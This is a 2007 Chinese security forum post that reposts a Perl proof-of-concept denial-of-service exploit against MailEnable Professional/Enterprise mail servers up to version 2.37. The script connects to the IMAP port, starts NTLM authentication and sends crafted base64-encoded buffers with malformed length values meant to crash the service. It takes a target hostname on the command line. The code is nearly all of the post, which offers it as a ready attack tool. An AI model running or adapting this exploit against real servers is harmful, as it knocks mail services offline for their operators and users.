MailEnable Professional/Enterprise <= 2.37 Denial of Service Exploit

pub!1c

魔

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 3926
精华: 128
积分: 209876
阅读权限: 200
性别: 男
在线时间: 1107 小时
注册时间: 2007-10-23
最后登录: 2008-8-29

资料收集奖运营支持奖

发短消息
加为好友
当前离线

楼主大中小发表于 2007-2-16 11:20 只看该作者

MailEnable Professional/Enterprise <= 2.37 Denial of Service Exploit

复制内容到剪贴板

代码:

#!/usr/bin/perl

#

# maildisable-v7.pl

#

# Mail Enable Professional/Enterprise v2.32-7 (win32)

# by mu-b - Wed Feb 14 2007

#

# - Tested on: Mail Enable Professional v2.37 (win32)

#

########



use Getopt::Std; getopts(&#39;t:&#39;, \%arg);

use Socket;

use MIME::Base64;



&print_header;



my $target;



if (defined($arg{&#39;t&#39;})) { $target = $arg{&#39;t&#39;} }

if (!(defined($target))) { &usage; }



my $imapd_port = 143;

my $send_delay = 2;



my $PAD = &#39;A&#39;;



if (connect_host($target, $imapd_port)) {

   print("-> * Connected\n");

   send(SOCKET, "1 AUTHENTICATE NTLM\r\n", 0);

   sleep($send_delay);



   $buf = ($PAD x 12).

        "\xfa\xff\xff\xff".

        ($PAD x 12);

   send(SOCKET, encode_base64($buf)."\r\n", 0);

   sleep($send_delay);



   $buf = ($PAD x 28).

        "\x00\x01".

        ($PAD x 2).

        "\xff\xff\xff\x7f";

   send(SOCKET, encode_base64($buf)."\r\n", 0);

   sleep($send_delay);



   print("-> * Successfully sent payload!\n");

}



sub print_header {

   print("MailEnable Pro v2.37 DoS POC\n");

   print("by: <mu-b\@digit-labs.org>\n\n");

}



sub usage {

   print(qq(Usage: $0 -t <hostname>



    -t <hostname>   : hostname to test

));



   exit(1);

}



sub connect_host {

   ($target, $port) = @_;

   $iaddr  = inet_aton($target)            || die("Error: $!\n");

   $paddr  = sockaddr_in($port, $iaddr)      || die("Error: $!\n");

   $proto  = getprotobyname(&#39;tcp&#39;)          || die("Error: $!\n");



   socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");

   connect(SOCKET, $paddr)               || die("Error: $!\n");

   return(1338);

}

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » MailEnable Professional/Enterprise <= 2.37 Denial of Service Exploit

MailEnable Professional/Enterprise &lt;= 2.37 Denial of Service Exploit

MailEnable Professional/Enterprise &lt;= 2.37 Denial of Service Exploit

代码:

MailEnable Professional/Enterprise <= 2.37 Denial of Service Exploit

MailEnable Professional/Enterprise <= 2.37 Denial of Service Exploit